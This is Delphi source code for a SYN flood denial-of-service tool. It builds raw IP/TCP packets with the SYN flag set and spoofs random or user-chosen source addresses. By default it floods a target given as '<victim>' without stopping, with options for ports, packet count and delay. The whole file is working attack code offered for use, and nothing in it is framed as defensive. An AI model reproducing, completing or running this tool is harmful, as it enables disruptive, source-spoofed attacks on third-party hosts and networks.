unit MainUnit;

interface

uses
  Winsock2, SysUtils2, SocketHeaders;

type
  TPorts = array of Word;
  TSynOptions = packed record
    Delay: Cardinal;
    DstPorts: TPorts;
    HedefAdres: TSockAddrIn;
    Num: Cardinal;
    Sended: Cardinal;
    Socket: TSocket;
    SpoofIP: Cardinal;
    SrcPorts: TPorts;
  end;

var
  SynOpt: TSynOptions;

  function GetPorts(Ports: string): TPorts;
  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(host: PChar): Cardinal;
  function ValidPort(S: string): Boolean;
  procedure CreateSocket;
  procedure SendSyn(sport, dport: Word);
  procedure SendSyn_FillIPhdr(IPhdr: PIPhdr);
  procedure SendSyn_FillTCPhdr(TCPhdr: PTCPhdr; IPhdr: PIPhdr; sport, dport: Word);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(s: string);

implementation

function GetPorts(Ports: string): TPorts;
  procedure AddPort(Port: string);
  begin
    if ValidPort(Port) then begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := StrtoInt(Port);
    end
      else Writeln('Skipping invalid port: ' + Port);
  end;
var
  i: integer;
  S: string;
begin
  i := Pos(',', Ports);
  while i > 0 do begin
    S := Copy(Ports, 1, i - 1);
    Delete(Ports, 1, i);
    AddPort(S);
    i := Pos(',', Ports);
  end;
  AddPort(Ports);
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen);
  //if WSAGetLastError <> 0 then Writeln('Unable to send syn packet no: ' + InttoStr(SynOpt.Sended));
  WSACancelBlockingCall;
  WSAUnhookBlockingHook;
end;

function Resolve(host: PChar): Cardinal;
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host);
  if InAddr.S_addr = INADDR_NONE then begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result := InAddr.S_addr;
end;

function ValidPort(S: string): Boolean;
begin
  Result := (StrtoIntDef(S, -1) <> -1) and (StrtoIntDef(S, -1) >= 0) and
          (StrtoIntDef(S, -1) <= 65535); 
end;

procedure CreateSocket;
begin
  SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SynOpt.Socket = INVALID_SOCKET then begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SynOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', Sizeof(PInteger)) <> 0 then begin
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Len = 40;

procedure SendSyn(sport, dport: Word);
var
  Buffer: array [0..(Len - 1)] of Char;
  IPhdr: PIPhdr;
  TCPhdr: PTCPhdr;
begin
  FillChar(Buffer[0], Sizeof(Buffer), 0);
  IPhdr := PIPhdr(@Buffer[0]);
  TCPhdr := PTCPhdr(@Buffer[20]);
  SendSyn_FillIPhdr(IPhdr);
  SendSyn_FillTCPhdr(TCPhdr, IPhdr, sport, dport);
  Gonder(SynOpt.Socket, Buffer[0], Len, 0, SynOpt.HedefAdres, Sizeof(SynOpt.HedefAdres));
end;

procedure SendSyn_FillIPhdr(IPhdr: PIPhdr);
begin
  Random;
  IPhdr.ip_verlen := $45;
  IPhdr.ip_len := htons(Len);
  IPhdr.ip_id := htons(Random(65535));
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 6;
  IPhdr.ip_src := SynOpt.SpoofIP;
    if SynOpt.SpoofIP = 0 then IPhdr.ip_src := (integer(Random(65535)) shl 16 ) + Random(65535);
  IPhdr.ip_dst := SynOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
end;

procedure SendSyn_FillTCPhdr(TCPhdr: PTCPhdr; IPhdr: PIPhdr; sport, dport: Word);
var
  Buffer: array [0..31] of Char;
  PSeudohdr: Ppseudohdr_tcp;
begin
  Random;
  TCPhdr.tcp_src := htons(sport);
    if sport = 0 then TCPhdr.tcp_src := htons(Random(65535));
  TCPhdr.tcp_dst := htons(dport);
    if dport = 0 then TCPhdr.tcp_dst := htons(Random(65535));
  TCPhdr.tcp_seq := htonl(Random(High(Cardinal)));
  TCPhdr.tcp_ack := htonl(Random(High(Cardinal)));
  TCPhdr.tcp_flags := $02;
  TCPhdr.tcp_win := htons(Random(65535));
  TCPhdr.tcp_urp := htons(Random(65535));
  FillChar(Buffer[0], Sizeof(Buffer), 0);
  PSeudohdr := Ppseudohdr_tcp(@Buffer[0]);
  PSeudohdr.saddr := IPhdr.ip_src;
  PSeudohdr.daddr := IPhdr.ip_dst;
  PSeudohdr.protocol := 6;
  PSeudohdr.length := htons(20);
  PSeudohdr.tcphdr := TCPhdr^;
  TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);
  SynOpt.HedefAdres.sin_port := TCPhdr.tcp_dst;
end;

procedure SetDefaultOptions;
begin
  SynOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SynOpt.Delay := 1;
  SetLength(SynOpt.DstPorts, 1);
  SynOpt.DstPorts[0] := 0;
  SynOpt.HedefAdres.sin_family := AF_INET;
  SynOpt.HedefAdres.sin_port := htons(1243);
  SynOpt.Num := 0;
  SynOpt.Sended := 0;
  SynOpt.SpoofIP := 0;
  SetLength(SynOpt.SrcPorts, 1);
  SynOpt.SrcPorts[0] := 0;
end;

procedure SetParams;
var
  i: integer;
  S: string;
  C: Char;
begin
  for i := 2 to ParamCount do begin
    S := ParamStr(i);
    C := #0;
    if Length(S) = 2 then if S[1] = '-' then C := S[2];
    case C of
      'S' : SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1)));
      'p' : begin
              SynOpt.DstPorts := GetPorts(ParamStr(i + 1));
              if Length(SynOpt.DstPorts) = 0 then begin
                Writeln('No valid ports found on the dst port list');
                Halt(0);
              end;
            end;
      's' : begin
              SynOpt.SrcPorts := GetPorts(ParamStr(i + 1));
              if Length(SynOpt.SrcPorts) = 0 then begin
                Writeln('No valid ports found on the src port list');
                Halt(0);
              end;
            end;
      'n' : SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd' : SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(s: string);
begin
  Write(
        'usage: ' + s + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -S:    Spoof host                         (0 is random (default))'#13#10 +
        '  -p:    Comma separated list of dest ports (0 is random (default))'#13#10 +
        '  -s:    Comma separated list of src ports  (0 is random (default))'#13#10 +
        '  -n:    Num of packets                     (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)                      (default 1)'#13#10
       );
  Halt(0);
end;

end.
